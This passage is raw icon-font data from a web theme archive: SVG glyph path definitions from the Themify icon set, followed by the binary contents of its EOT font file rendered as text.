15.541 33.762 33.762 33.762s33.28-15.33 33.28-33.762zM392.734 380.883c0-14.517 11.897-26.443 26.474-26.443s26.474 11.926 26.474 26.443c0 14.577-11.926 26.504-26.474 26.504-14.577 0-26.474-11.927-26.474-26.504zM478.238 228.397c0 19.908-16.264 36.171-36.171 36.171-7.771 0-15.059-2.439-20.901-6.806 20.901-16.775 35.69-36.442 43.249-57.826 8.493 6.837 13.824 17.046 13.824 28.461z" />
<glyph unicode="&#xe753;" d="M256 464.941c-133.060 0-240.941-107.851-240.941-240.941 0-98.635 59.332-183.417 144.233-220.672-0.662 16.836-0.15 37.014 4.186 55.326 4.608 19.546 30.991 131.283 30.991 131.283s-7.71 15.39-7.71 38.129c0 35.72 20.721 62.343 46.501 62.343 21.925 0 32.497-16.444 32.497-36.141 0-22.016-14.065-54.995-21.293-85.504-6.024-25.57 12.83-46.411 38.038-46.411 45.659 0 76.409 58.609 76.409 128.090 0 52.796-35.599 92.34-100.262 92.34-73.096 0-118.603-54.543-118.603-115.38 0-21.022 6.174-35.81 15.872-47.255 4.428-5.271 5.060-7.409 3.464-13.433-1.144-4.428-3.825-15.119-4.909-19.336-1.626-6.114-6.565-8.283-12.047-6.053-33.702 13.764-49.363 50.628-49.363 92.070 0 68.428 57.706 150.528 172.213 150.528 91.979 0 152.516-66.59 152.516-138.029 0-94.54-52.555-165.135-129.988-165.135-26.022 0-50.507 14.095-58.88 30.058 0 0-13.975-55.537-16.926-66.228-5.12-18.582-15.119-37.135-24.275-51.622 21.655-6.445 44.544-9.909 68.276-9.909 133.060 0 240.941 107.851 240.941 240.941s-107.882 240.941-240.941 240.941z" />
<glyph unicode="&#xe754;" d="M0 409.555l209.829 28.883v-202.752h-209.829v173.869zM0 38.445l209.829-28.883v200.283h-209.829v-171.399zM232.93 441.54v-205.854h279.070v244.315l-279.070-38.46zM232.93 6.46l279.070-38.46v241.845h-279.070v-203.385z" />
<glyph unicode="&#xe755;" d="M417.099 20.706c-15.33-7.83-35.78-25.058-43.309-32.286-5.662-5.391-29.034-8.101-42.225-1.356-15.33 7.83-7.259 20.209-30.931 20.962-11.836 0.301-23.401 0.301-34.966 0.301-10.21-0.301-20.42-0.813-30.931-1.054-35.478-0.813-38.972-23.702-61.862-22.889-15.601 0.542-35.208 12.921-69.12 19.877-23.672 4.879-46.502 6.174-51.38 16.685-4.819 10.511 5.933 22.317 6.716 32.527 0.813 13.733-10.21 32.286-2.139 39.303 6.987 6.174 21.775 1.627 31.443 6.957 10.21 5.903 14.516 10.511 14.516 23.13 3.764-12.86-0.271-23.341-8.614-28.461-5.12-3.223-14.516-4.849-22.347-4.066-6.174 0.572-9.939-0.241-11.565-2.68-2.41-2.952-1.627-8.342 1.355-15.33 2.952-6.988 6.445-11.565 5.903-20.149-0.271-8.613-9.939-18.853-8.313-26.112 0.542-2.711 3.222-5.12 9.939-6.988 10.752-2.952 30.388-5.903 49.483-10.511 21.263-5.361 43.309-15.029 57.043-13.161 40.869 5.662 17.468 49.483 11.023 59.934-34.696 54.363-57.555 89.841-75.836 75.866-4.578-3.764-4.849 9.156-4.578 14.276 0.813 17.769 9.698 24.185 15.059 37.918 10.21 26.112 18.010 55.928 33.611 71.258 11.655 15.089 29.937 39.544 33.46 52.435-2.982 27.979-3.795 57.555-4.307 83.335-0.542 27.708 3.764 51.953 34.966 68.849 7.5 4.066 17.438 5.662 27.949 5.662 18.552 0.301 39.244-5.12 52.435-14.788 20.992-15.601 34.154-48.67 32.557-72.313-1.084-18.553 2.139-37.647 8.072-57.555 6.988-23.401 18.041-39.786 35.78-58.609 21.263-22.588 37.918-66.952 42.767-95.172 4.307-26.413-1.627-42.797-7.259-43.611-8.613-1.295-13.974-28.461-40.87-27.407-17.197 0.813-18.824 11.023-23.673 19.908-7.8 13.704-15.601 9.397-18.553-5.12-1.627-7.259-0.572-18.041 1.868-26.052 4.849-16.956 3.223-32.828 0.271-52.465-5.662-37.105 26.082-44.092 47.345-26.323 20.962 17.438 25.54 20.149 51.892 29.305 40.056 13.733 26.624 25.811 5.090 33.069-19.365 6.476-20.149 39.033-13.192 45.207 1.627-34.966 19.908-40.087 27.437-44.906 33.069-20.51-12.378-37.466-32.015-47.405zM371.923 150.573c7.259 24.245 4.036 33.882-0.783 56.772-3.764 17.197-19.637 40.629-32.015 47.857 3.223-2.68 9.156-10.481 15.33-22.287 10.752-20.209 21.504-50.026 14.517-74.782-2.68-9.637-9.125-10.993-13.433-11.264-18.824-2.168-7.8 22.588-15.601 56.17-8.885 37.677-18.010 40.358-20.149 43.309-11.084 48.911-23.161 44.062-26.684 62.344-2.952 16.414 14.276 29.846-9.125 34.424-7.259 1.356-17.468 8.613-21.504 9.156-4.036 0.512-6.204 27.166 8.854 27.979 14.788 1.084 17.498-16.685 14.788-23.702-4.276-6.957 0.271-9.668 7.56-7.228 5.903 1.867 2.139 17.468 3.493 19.606-3.764 22.588-13.192 25.811-22.86 27.708-37.135-2.952-20.45-43.851-24.214-40.087-5.391 5.662-20.962 0.542-20.962 4.066 0.271 20.962-6.746 33.069-16.414 33.34-10.752 0.271-15.059-14.788-15.601-23.371-0.813-8.072 4.578-25.058 8.613-23.703 2.68 0.813 7.258 6.204 2.41 5.903-2.41 0-6.174 5.933-6.716 12.921-0.271 7.017 2.44 14.005 11.565 13.733 10.481-0.271 10.481-21.233 9.397-22.046-3.464-2.41-7.8-7.018-8.343-7.801-3.464-5.662-10.18-7.228-12.891-9.698-4.578-4.819-5.632-10.21-2.138-12.077 12.348-6.988 8.313-15.029 25.54-15.631 11.294-0.542 19.607 1.626 27.437 4.036 5.903 1.868 25.028 5.903 29.033 12.921 1.868 2.952 4.036 2.952 5.361 2.138 2.68-1.325 3.223-6.445-3.493-8.072-9.397-2.71-18.824-7.83-27.407-11.053-8.343-3.464-11.023-4.819-18.823-6.144-17.739-3.223-30.9 6.445-19.095-5.12 4.036-3.764 7.8-6.174 18.011-5.933 22.588 0.813 47.616 28.010 50.026 15.902 0.512-2.68-7.017-5.903-12.921-8.885-20.962-10.21-35.75-30.66-49.212-23.642-12.107 6.445-24.185 36.322-23.944 22.829 0.271-20.691-27.166-38.972-14.517-62.644-8.343-2.108-26.895-41.683-29.576-62.103-1.626-11.836 1.084-26.353-1.898-34.425-4.036-11.836-22.317 11.294-16.384 39.514 1.054 4.819 0 5.933-1.356 3.464-7.258-13.161-3.222-31.714 2.68-44.604 2.44-5.662 8.613-8.072 13.191-12.921 9.397-10.722 46.501-38.189 52.977-44.906 8.343-7.8 5.933-26.052-11.294-27.949 8.885-16.685 17.468-18.312 17.227-45.447 10.21 5.361 6.204 17.197 1.868 24.697-2.982 5.421-6.716 7.83-5.933 9.156 0.542 0.813 5.933 5.421 8.885 1.868 9.125-10.21 26.353-12.077 44.635-9.668 18.553 2.168 38.46 8.613 47.586 23.401 4.307 6.988 7.259 9.397 9.156 8.072 2.139-1.054 2.981-5.903 2.68-13.974-0.271-8.613-3.764-17.498-6.174-24.757-2.44-8.342-3.223-13.974 4.849-14.276 2.139 15.089 6.445 29.877 7.529 44.935 1.356 17.197-11.023 48.911 2.44 64.813 3.493 4.307 7.771 4.819 13.704 4.819 0.783 21.534 33.882 19.877 44.906 11.023 0 4.879-10.481 9.427-14.788 11.324zM152.486 228.006c-1.898-3.464-6.716-6.144-2.982-6.716 1.356-0.271 5.12 3.012 6.746 6.716 1.325 4.578 2.68 7.018 0.542 7.831-2.44 0.783-1.898-4.036-4.307-7.831zM214.046 373.775c-3.222 0.813-2.68-4.005-1.054-3.493 1.084 0 2.44-1.627 1.868-4.036-0.542-3.222-0.271-5.421 2.168-5.421 0.271 0 0.783 0 0.783 0.813 1.114 6.776-2.138 11.596-3.764 12.137zM221.334 349.048c-2.68-0.271-2.168 5.933 6.445 5.391-5.391-0.542-3.494-5.391-6.445-5.391zM243.381 353.626c7.8 3.464 10.481-1.897 7.8-2.981-2.71-0.783-2.982 4.337-7.8 2.981zM275.908 375.401c-3.493-0.301-2.409-1.868-0.783-2.409 2.139-0.603 4.307-4.337 4.849-8.343 0-0.542 2.68 0.542 2.68 1.356 0.241 6.415-5.391 9.638-6.747 9.397zM291.509 433.468c-2.139 2.168-4.307 4.066-6.445 4.066-5.391-0.542-2.711-6.174-3.493-8.885-1.084-2.952-5.090-5.391-2.409-7.529 2.44-1.868 4.036 2.952 9.156 4.819 1.325 0.572 7.529-0.241 8.854 2.71 0.241 1.356-3.223 2.952-5.662 4.819zM321.356 314.654c-5.090 3.192-6.174 8.584-8.041 6.716-5.662-6.174 6.988-19.095 12.348-20.209 3.223-0.542 5.662 3.795 4.849 7.56-1.084 5.090-4.849 3.222-9.156 5.933z" />
<glyph unicode="&#xe756;" d="M496.941 152.712c0-51.531-42.587-93.425-94.81-93.425-1.868 0-3.524 0.241-5.18 0.241h-286.358c-52.706 3.072-95.533 43.309-95.533 95.533 0 35.057 19.064 65.656 47.526 82.341-1.867 6.114-2.831 12.469-2.831 19.305 0 35.99 29.425 65.174 66.108 65.174 15.059 0 29.184-5.18 40.478-13.643 23.070 47.526 72.012 80.474 129.175 80.474 79.3 0 143.3-63.308 143.3-141.191 0-2.831-0.241-5.662-0.241-8.463 34.123-14.125 58.368-47.525 58.368-86.347zM193.898 114.341c23.070 0 39.756 7.288 56.47 23.281-6.837 8.463-14.366 16.716-21.413 25.178-9.637-9.397-20.239-15.3-33.882-15.3-16.715 0-31.052 11.053-31.052 28.461 0 17.167 14.366 28.461 30.6 28.461 51.772 0 62.825-90.353 138.12-90.353 36.714 0 67.764 23.070 67.764 61.651 0 39.063-31.292 61.892-68.457 61.892-23.070 0-40.237-6.596-56.712-22.829 7.529-8.222 14.577-16.926 21.895-25.419 9.397 9.186 19.998 15.059 33.401 15.059 15.541 0 31.051-11.053 31.051-27.527 0-18.131-13.192-29.636-30.81-29.636-50.116 0-63.518 90.353-136.945 90.353-36.472 0-68.698-22.348-68.698-61.169-0.060-39.725 31.232-62.103 68.668-62.103z" />
<glyph unicode="&#xe757;" d="M300.544 118.257l-47.375-47.676-9.397-9.397c-27.618-27.286-66.198-36.714-101.316-27.919-6.626-28.883-32.346-50.206-63.066-50.206-35.449 0-64.332 28.883-64.332 64.632 0 30.389 21.022 56.139 49.573 62.705-9.096 35.478 0.301 74.391 27.919 101.978l3.764 3.764 47.375-47.707-3.434-3.433c-15.692-15.36-15.36-40.448 0-56.109 15.36-15.39 40.478-15.39 55.838 0l9.427 9.397 47.375 47.707 50.508 50.176 47.375-47.707-50.236-50.206zM247.537 378.654l-47.676-47.646-3.795 3.764c-15.36 15.36-40.478 15.36-55.838 0-15.36-15.39-15.36-40.81 0-56.17l106.978-106.978-47.345-47.676-50.507 50.206-47.375 47.646-9.427 9.397c-28.883 28.551-37.647 69.662-26.684 106.375-28.852 6.264-50.176 31.985-50.176 62.735 0 35.78 28.883 64.632 64.332 64.632 32.316 0 58.669-23.522 63.669-53.971 34.816 8.162 72.794-1.596 100.081-28.522l3.764-3.795zM440.471 336.308c10.361-36.051 1.235-76.529-27.286-105.080l-3.764-3.764-47.375 47.707 3.764 3.734c15.36 15.39 15.36 40.508 0 55.868-15.36 15.36-40.478 15.36-55.838 0l-107.309-107.34-47.676 47.707 50.507 50.206 47.676 47.646 9.096 9.427c28.551 28.522 69.331 37.647 105.743 26.956 4.367 31.413 31.353 55.567 64 55.567 35.449 0 64.332-28.883 64.332-64.632-0.030-32.618-24.486-59.603-55.868-64zM432.61-16.941c-31.353 0-57.404 22.257-63.368 51.772-36.382-11.264-78.125-2.53-106.978 26.353l-3.433 3.764 47.375 47.676 3.764-3.735c15.36-15.39 40.478-15.39 55.838 0 15.36 15.36 15.36 40.448 0 55.838l-9.397 9.427-97.913 97.852 47.676 47.707 97.882-97.913 9.125-9.397c27.286-27.286 37.014-65.897 28.22-101.014 31.382-4.397 55.537-31.082 55.537-63.668 0-35.78-28.853-64.662-64.332-64.662z" />
<glyph unicode="&#xe758;" d="M468.028 464.941l-38.55-433.062-174.080-48.82-172.875 48.82-38.55 433.062h424.057zM389.12 376.425h-266.24l14.155-160.828h184.35l-6.686-68.638-59.302-16.022-59.030 15.993-3.916 42.135h-52.676l6.626-83.697 109.026-30.118h1.175v0.301l108.152 29.817 15.059 163.84h-193.988l-4.518 54.513h202.993l4.819 52.706z" />
<glyph unicode="&#xe759;" d="M256 464.941c-133.060 0-240.941-107.911-240.941-240.941 0-133.060 107.882-240.941 240.941-240.941s240.941 107.882 240.941 240.941c0 133.029-107.882 240.941-240.941 240.941zM163.629 149.339c-41.894 0-75.867 33.913-75.867 75.836 0 41.894 33.972 75.836 75.867 75.836s75.806-33.942 75.806-75.836c0-41.924-33.942-75.836-75.806-75.836zM353.882 149.339c-41.894 0-75.836 33.913-75.836 75.836 0 41.894 33.942 75.836 75.836 75.836s75.836-33.942 75.836-75.836c0-41.924-33.942-75.836-75.836-75.836z" />
<glyph unicode="&#xe75a;" d="M0 419.764v-391.529h512v391.529h-512zM255.82 184.335l-207.691 205.312h416.226l-208.535-205.312zM173.327 223.518l-143.209-141.011v282.594l143.209-141.583zM194.74 202.346l61.019-60.325 60.115 59.212 144.565-142.878h-411.919l146.221 143.993zM337.348 222.344l144.535 142.306v-285.124l-144.534 142.818z" />
<glyph unicode="&#xe75b;" d="M257.897-16.941c-111.978 0-212.691 88.124-212.691 207.993 0 119.688 93.304 175.074 110.592 184.139 20.601 10.963 35.418 16.745 58.73 35.388 11.535 9.065 21.143 22.257 24.184 54.362 16.715-20.028 36.774-43.339 51.019-52.977 23.341-15.36 46.683-21.413 71.077-36.774 14.818-9.065 105.954-64.753 105.954-187.964 0-122.94-97.159-204.167-208.866-204.167zM422.55 181.745c-21.956 0-66.409-45.568-89.721-45.839-27.136-0.542-64.723 53.82-119.085 53.308-42.827-0.301-76.559-34.334-77.132-70.565-0.271-20.329 6.325-35.418 20.329-44.996 9.337-6.295 17.829-10.149 45.538-10.149 46.11 0 104.568 57.103 131.464 56.23 21.384-0.783 54.573-53.248 71.349-54.332 13.161-1.084 20.028 4.94 31.262 21.113 10.963 16.474 15.661 42.285 15.661 56.832 0 14.245-6.325 38.4-29.666 38.4zM358.912 36.036c-9.337-6.867-30.208-15.39-59.844-15.39s-43.611 6.325-52.947 13.462c-1.356 1.084-0.813 1.084-3.584 1.084-3.012 0-4.638-1.385-7.108-3.283-2.198-1.928-3.283-6.596 0-9.878 20.299-18.643 54.332-17.017 79.3-14.788 25.269 2.469 46.683 17.257 48.851 19.456 3.283 3.252 2.469 6.024 1.897 7.951-0.542 1.928-2.199 4.638-6.565 1.385zM344.064 82.929c-5.481 3.554-13.402 4.126-20.812 4.126-7.439 0-11.535 0.542-19.456-2.74-8.012-3.283-16.233-10.692-21.413-15.39-5.24-4.638-6.053-8.222-3.313-12.077 2.771-3.524 5.783-1.325 13.462 5.24 7.951 6.325 13.192 12.077 29.365 12.077s18.944-6.053 22.197-12.077c3.313-6.024 3.584-6.867 6.867-5.24 3.855 1.928 5.783 4.699 3.855 9.397-1.957 4.638-5.24 12.86-10.752 16.685z" />
<glyph unicode="&#xe75c;" d="M15.059 198.58l141.764-92.461 99.177 82.703-142.908 88.245zM156.822 448.015l-141.764-92.491 98.033-78.457 142.908 88.154zM496.941 355.524l-141.733 92.491-99.207-82.793 142.938-88.154zM256 188.822l99.207-82.703 141.733 92.461-98.003 78.486zM256.301 171.023l-99.478-82.492-42.556 27.829v-31.172l142.035-85.203 142.065 85.203v31.172l-42.587-27.829z" />
<glyph unicode="&#xe75d;" d="M496.941 442.052l-72.493-363.339-219.166-72.764-190.223 72.764 19.365 97.069h80.956l-7.921-40.057 114.989-43.882 132.457 43.882 18.492 92.401h-329.156l15.782 80.896h329.487l10.39 52.103h-329.216l16.052 80.926h410.202z" />
<glyph unicode="&#xe75e;" d="M300.243 58.353h-30.118c0 97.37-80.655 176.58-179.772 176.58v30.118c115.742 0 209.89-92.732 209.89-206.697zM90.353 374.588v-30.117c160.436 0 286.118-125.681 286.118-286.118h30.118c0 177.333-138.902 316.236-316.236 316.236zM180.706 103.5c0 24.908-20.209 45.207-45.086 45.207-24.968 0-45.267-20.3-45.267-45.207s20.299-45.176 45.267-45.176c24.877 0 45.086 20.269 45.086 45.176zM150.588 103.5c0-8.283-6.716-15.059-14.969-15.059-8.343 0-15.149 6.776-15.149 15.059 0 8.313 6.806 15.089 15.149 15.089 8.252 0 14.969-6.776 14.969-15.089zM512 13.176v421.647c0 24.908-20.269 45.176-45.176 45.176h-421.647c-24.907 0-45.176-20.269-45.176-45.176v-421.647c0-24.907 20.269-45.176 45.176-45.176h421.647c24.907 0 45.176 20.269 45.176 45.176zM466.824 449.882c8.313 0 15.059-6.776 15.059-15.059v-421.647c0-8.283-6.747-15.059-15.059-15.059h-421.647c-8.313 0-15.059 6.776-15.059 15.059v421.647c0 8.282 6.746 15.059 15.059 15.059h421.647z" />
<glyph unicode="&#xe75f;" d="M336.505-32h-30.118c0 166.068-137.457 301.176-306.387 301.176v30.118c185.555 0 336.505-148.63 336.505-331.294zM0 480v-30.118c270.216 0 481.882-211.667 481.882-481.882h30.118c0 287.082-224.918 512-512 512zM120.471 28.205c0 33.25-26.986 60.266-60.115 60.266-33.28 0-60.356-27.015-60.356-60.265 0-33.22 27.076-60.205 60.356-60.205 33.13 0 60.115 26.986 60.115 60.205zM90.353 28.205c0-16.595-13.463-30.087-29.997-30.087-16.685 0-30.238 13.493-30.238 30.087 0 16.625 13.553 30.148 30.238 30.148 16.535 0 29.997-13.523 29.997-30.148z" />
</font></defs></svg>PK!�!�3�30it_sanctum/fonts/themify-icons/fonts/themify.eotnu&1i��3�2�LP���themifyRegularVersion 1.0themify�0OS/2"��`cmapUͶLgasphglyfy�Y�p'Theadi�(�6hhea�<(�$hmtx�'T) �loca��.��maxp��1| nameU��1�9post2� �LfGLf��@�_����  8
 �_���� ���������797979���#'#5'#53'75373cFF��AccFFDEcIFFcc��AFFccED=����&=T";#7'#".=4>;752>54.#52#7#52>54.#52l	5��6AC<		y!,!!,!-
	A	��c���A��	

<+!!!!,���W�.'5>7>7>.'<6&5&>7>&'.'&"5%5%>?5'./.'.1'&4&4=4>7>7>7630'4G*
$
	+H5� 1?%
						$>0�@8, +	
		
	

' ,9+ P
		

	Q!+<����G`%'5.54>67%.=4>%54.''4>664.'&7>=�
��

!,,!)77)	
��,�B@J�

�	;+""+8((8=	������']bglq7>.>7#".'.677>2"&'.46?'32>?>4&'."735#7'77''7@*
#()
	*	

	:[ 

['('�{{;;00���EN	
N	


#()W[  &)'[')'(""�RR/WWi����8=B.#"#!5#'2#>33+".53;2>5#533#53I
lLl:4y

�
��Z�

K��

=��=�������2k����%2>'6.#".#"3:62332>73'#"./""#".7&>327>32#"./"32>'6.#".7&>32#"32>'6.#64>32"&7Z"=,,="(&1&&1

	6

((		&1&&1
6
		

		
r

		�*7 8)
!.-"(	#"

",,!3





[



%����� A%#.'5##335>7355#.'35#>735#3>0@$$?/>>/?$$@0>�3(;;(35(;;(5�$?1>>0?$$?0==1?$�<<(44(::(44(�����
"77''7'32>'6.#"72#".'>3wyy{]]Y[[�
		
6		�W��TTnW�u??%AB���		����-FKP%.54>6%.54>%'4.%%>5%%�	��		p	��p��L����+		��[

�

�[���K��������
#'#7'7'7'373��::��:��:��^^$_u$$u_$
��o�nn�o�EEoEooEo<����%49>G"#;2>5#.#2#>3+".53#35#537'7'7� 
	�		�
i��<ZZ�^��^�	��		<	�����ZZ<����0G^u�4.''75'5>54>7'.5'.54>7.54>7%'>54.'7'>54.'7Z!!<�<�				<		L





l		:





h 

 ��
		
7



0	






�����)>S]bg7"32>54.#".54>32#%"32>54.#".54>32#!!?35#!'!'!!S								@	�t!gSm��e��T��h		L		L		L		�<��0[�yy�����)>S]bkt7"32>54.#".54>32#%"32>54.#".54>32#!!?35#!'!'#53353'#53#5#S								@	�t!g Sm'��e!�����h		L		L		L		�<��/��wYYw�;:���)�*"32>54.#".54>32#764645<&4/.'7.'./"."#*#'7223:62?>7>7'>?#'0*#*1/./.'7'./<5<5?>?'>77>?0:3:17				�N&

H				H

&NN&

H				H

&NfDD$JJ$DD:J,x						H

&NN&

H				G

'NN'

H		5$::$DD$;;$6����!;%'>54.#"32>77%".54>7>32#�5H(&# 5G)# 
���"=-
 "<--<"�
 #)G5
 $%(H5�u,=" -=""<-����!;H%'>54.#"32>77%".54>7>32#73##5#5353�5H(&# 5G)# 
���"=-
 "<--<"<<==�
 #)G5 #&(H5�v-<" 
-=""<-�<<==����!;@%'>54.#"32>77%".54>7>32#'3#5�5H(&# 5G)# 
���"=-
 "<--<"L���
 #)G5
 $%(H5�u,=" -=""<-�����<Qf%"'7''.#"32>7.'732>7.#".'>32#!".7&>32#�G����E	
"" 
DB	" 

 ��
		

		
�J����J!!!	
GG
	!!!�











���i�%3##535#535#535#535#535#535#535#53��Ҵ�<<<<<<<<����<����#.3T#"7.#32#'>373##/33'33##737#737#737#737#737#737#737#73�<	MI
::YY[<  y�Զ�;=;=;=;=��	����A	k��?���?����<���%	'77'77'77'77'77'77'77'7'j���j���++**+**+k��k��j���*++*+**+k��kk����7!'3k����qo��.cb�hMMz������%#7'53'%!3#!#53.�[[�z==L�<<�y��/��==8��**�<��x����77#53>32.#"33#".'32>735#��,;H'(I<,	'5?#$C5&�&5C$#?5'	,<I('H;,��|$=,.@&!8(+<##<+(8!&@.,=$|�����%##5#53533�������������i�,94.#"35>5".54>32#7#4.#52i&&
!"i-	X''#��#K<

%��-'."7>&'7'?'?'7'7>2�*��5���9:'�@�?�>@�?)�*��5��;:S�@�?�@@?*����#7B'.?>54.'7'?'?'7'7>21�*�4����::&x?x?�@@�@+�����*�4�
	��<;Tw>y@�@?A+����y����49>5!#";2#35#54.+".=4>;!535##53!5!�x

�Z	������L�<<

Z	
-��-	Z[[�Z��Kyy���3N\m��%.#81"32>?3%4>7>3812.5#"./37!'.54>?#'32>54.'".54>7#���
C�				�l�Ym	~m�n�����1$~




	�
C				���
m��oo���#;		k


����%6"32>54.#2.54>3".'#2XA&&AX22XA&&AX2%# ��!:L,%# )!:L,�&AX22XA&&AX22XA&�� #%,L:!�Z) #%,L:!Z����',;P#";2>76.#32!7&>3!'!#".'7!#'#".7&>32x�	�	�������h�	�Z		�	--Z��KK-<���%!5!�x��i����.=cs"75>?>7>54.#'532>77"#"&/".#.54>32'''7'75377)JL)7-.,&&&&	
!,,!
		7#!!"59;�)6 
�99�
 6)�L""�



	,!!,	�:77:99i����.=cx"75>?>7>54.#'532>77"#"&/".#.54>32'#".54>327)JL)7-.,&&&&	
!,,!
					�)6 
�99�
 6)�L""�



	,!!,	W

���i�(7>#.+"3753732354.##32#5<1#'53A	

K78
	�KZ2
(Z(�

��F)FU��ei�f2��2 ��7>R'464656./.#"777>'6.''?7'74>#�6	��%XZ[��?�A��AK6H5		5��Y

[[	�@�@��@J4G#����	%'#'7ȹ���չ�p������	%'75'7������������'��	%!'7!������ҹ���#����	%'737�����������p�<����<Jf%'5.54>67%.=4>=4>7%54.&4.55&7>=�
	��

)77)	���!,,!��-�B@J�

�	; 6**6 ;

.=-  -=,��;����	?%;�%�X�a���W�%���`[����3i'7>4&'."267#".'.46?>27>2"&'.46?'32>?>4&'."�Z
Z')'�[  
[')'Z')'Z')'![  &)'[')'���	!!!!#35!!����<�<����-��-��Kyy���	!!!!7!53!#53��x���K��xK=[��K����[=���	!!!5!!53!5#537!53!5#53K��K��y��<Z��<�����y<����<�����$97'7'.'7>54.'77'7.54>6�4�
  !�544��		
		
"5�
 ""	
�364��	

	���	&%'777'.='7>='�nn���Z	�	D�nF��l�����

�����	!!!5!%!!%'''77�<��x��x��xpI/Kf�N(_�<�Z<<[-��7G2����+\���,Z".#"7>?4646'6.#./4&6&7&>323'>32x#!	%1&KQ?
DQL
$3f
:H@
@C>(&&(�%1	1eR69Td.	1%�%SK;

8JU(	''''����	�Wp.4&7&>32>32'>57&6&6'6.#"#.#"./.'74>7'7''7777'$3#!	%1&(&&(�"(/81
"0:-+!
�VUVU_KWTWTM]#	1%%1		
	''''		
	��'1$;,,;#1'�====C6<<<<6C>����.=4>7>=4.&44.=404=4.'405'.=40454.&405.5544.'"./.'1223.=./.67>7>54>6234>626666267�"cc

			
[�		


	�tz)�����%��
	
	�
		
/����##".=4>7>?46.'*"*&'&"&'.574.'""#*#".5'4.#"0""&'.5'4.'."&#""./.2#".=./.67>7>'&>7>7254>32>7>306243>2�$#	/jj		
		
		=�
	�d������;��		
�				

	

^����#".=4>7>=4.#""1#".=4.#"#".51581504.#"001#".515.#"81#".="&"&"017:#".=./.467>72625820=4>32>32>32626232�4	3

		
7�	66	�	@==NQe!p5'n7

	

���
'#!!'3%535!�;���H;��<���<h<�<�==y�x��"����%
/7#3���f��[���,__��-����
#3!!7'!!5��jZ��XW;�AA��wz\X�����
#33##535#5#35'335#�����x=<[�����<�<����'�{3H]r�%.#"32>7464&5".'>32#5"32>54.#".54>32#5"32>54.#".54>32#�3CO++OC33CO++OC3�%F;--;F%%F;--;F%((((



�%=++=%$=++=$�%3 4%%4 3%�((((�



y		4���	&'7'##!".7'#3!2>7'#���oo`�Y

�

-��q��Eq]���		�����	
75#'7'31#'#5'7�n��n2nn����n��n+n��n�����	";@7!5!7!!5%!"3!2>54.##!".54>3!23#5<��xL��y�Z		�		�Z����ҕ��ӵ�Z	��		2	��2��I���Ldp�#<=!#32>?#35#5>732>7>7>="&'.'.53'".'!#7"&/>73D��D	Y�\
�x	'�3>!<"=2�	
&�
!E;,=<
,;E!
��0C)

!HFCCPq}-5mJ�)C0:DN-

�����''!'!!%!'77|{�4�4���t��t��fxth��s�v�s�<�W��X����8Tp+532>=4.#!";75#".=4>3!2+'#".=4>;2#4.+";532>=	�Z-6h		�	Z	n		�	�%E-��
��W/[|
�		�\	\\	\	

	\::\���7!";7!2>54.##!5#".54>3!2�Z		�
		��d-��	��
{{
-	��XX-�����7<AF!";7!2>54.##!5#".54>3!2!!5!!53#5�Z		�
		��d-��xL��L�����	��
{{
-	��XX-��=<#��%''7'77��������������������j�N'54.'>=4."'"54>65'.=4>6j	

		'(`��
�+�

	
���-$$d�f%''7�����z���������%'7'7����������r��t�7'7����������[�\'77�����G����2��	'7���z���j�nz����
3!3#!''��Z��j��g��M2�����Gg[��N�"7G5##!!!5332>54.'3'#".54>32'.#"#5!#�W\��/�<�!+,!/<!!!!��H���j���,!!,ӗ!!!!Z==	�DUb#"54.+";2>=32>7;2>54.#".5<645#%#5%#53%53�:��	+		+	&"_:���
�y��y�		
&Y��H(�,�������2'#*1#7>32#4.#"30:32>5����	��		AJ�����

g
1���(-2757757'%'%5'57>6%7.&%%575�Z-�<m
 &,,'
m���	!!	4�x��<�X-/<���##��
	

���������#3%#77#733��G3=Xb\�'22�b=�Ӷ�xx���d�%'7#73ds\��t����������
5##!#!5!!#'##5#'7#5��ӵ�x���.N-88.O�<<��-����=FVZZVF����!&354.+"#!#'4>;2#5!5!!53353353�
�

[�Z���-�x��x=�<hH



H�x�HHH�N��<<���� %'77'77''7''7'7'7�1�2UW0�3UU3�0WU2�1WW�2�1WW1�2UW0�3UU3�0WU���t�%'7'7'7_usQOusQOuwwRzRwwR��R	l�T%'7!'7!'7�wR��RwwRzRw�tPPttPPt���� %#53'3#537'#53#7#53#553�X��X����X��X��������X��X����X��XxX��	#5'#5!���6�����6X��	%r���6X6������0''7.54>64.'7>5�nn�(F]55]F((F]55]F($=R//R=$$=R//R=$2�oo�Q6\G''G\64^E))E^40Q>##>Q0.S<%%<S.���0'7'7#".'>32#.#"32>7΃�oo1)E^46\G''G\64^E)#>Q0.S<%%<S.0Q>#c��nn�5]F((F]55]F((F]5/R=$$=R//R=$$=R/���0'7#".54>32#4.#"32>5Gnn���(F]55]F((F]55]F($=R//R=$$=R//R=$Nnn��n5]F((F]55]F((F]5/R=$$=R//R=$$=R/���0'77#".54>32#4.#"32>5n��nn�(F]55]F((F]55]F($=R//R=$$=R//R=$'��nnG5]F((F]55]F((F]5/R=$$=R//R=$$=R/2E��
''757'7�����)����g����?��
%'7'7'7'"����<��������������4��
7'77'7'7����'�������������2��
%'77'7'����������h����<����	#(-27Vq#!'#533533!73#5353#=3##3#553#5353#'3#5"30:3>7>54.##".54>32#���
cc�[<���=






	
�`�4cc�R�����<=<�			J
���!.;HUbn�����"32>'6.#3#.'7#>7373#&>73#.7;#>57.'3#7#.''#>7:623:23#>73.'.'3*"#*&"#7>735]F((F]54_D))D_4�ZMZZM.�����[OP	Y,F	
 ��
R
G uG
"
�	�O
	F
"�(F]55]F((F]55]F(��

Z

x



y

Y

		
��

Y



<���� BW%#".'>732>7#'#'.'>327332>7.#"3H&1 6*)" -& �9�

	or�!��
		
]+ )6 /'&,!#D|�
		x=|m		���	!5!!5!!5!7!!5!5!7!!5��<���<��<�xxZ<<�xxZ<<��yyZ<<���	"',16;!5!!5!!5!7!!5!5!7!!535#73#535#73#535#73#5�i��K��-��i��-��i��-�ӵxx<<xx<<xx<<�xxZ<<�xxZ<<��yyZ<<xxZ<<��xxZ<<��yyZ<<���	"'35#73#5%35##5335#73#535#73#5�����ӵ�����������
�ӵ���ӵ�����ӵ����ӵ��:�h#3#5#3#535##533#353#35#5335#�<[<��<[<h=��==��=���!5!37'7���n��n���Un��n<����"'##".=#53#32>=#53!5!�-=""=-[%11%[�x��x��"<--<"��1%%1��<���27La~!##380132>58401380132>5840133#7".54>32#!".54>32#7#.#"#.#"#535!��W$:<


�


<�u@[Z'
	
�
	
'��[x�				iyZZ��				=



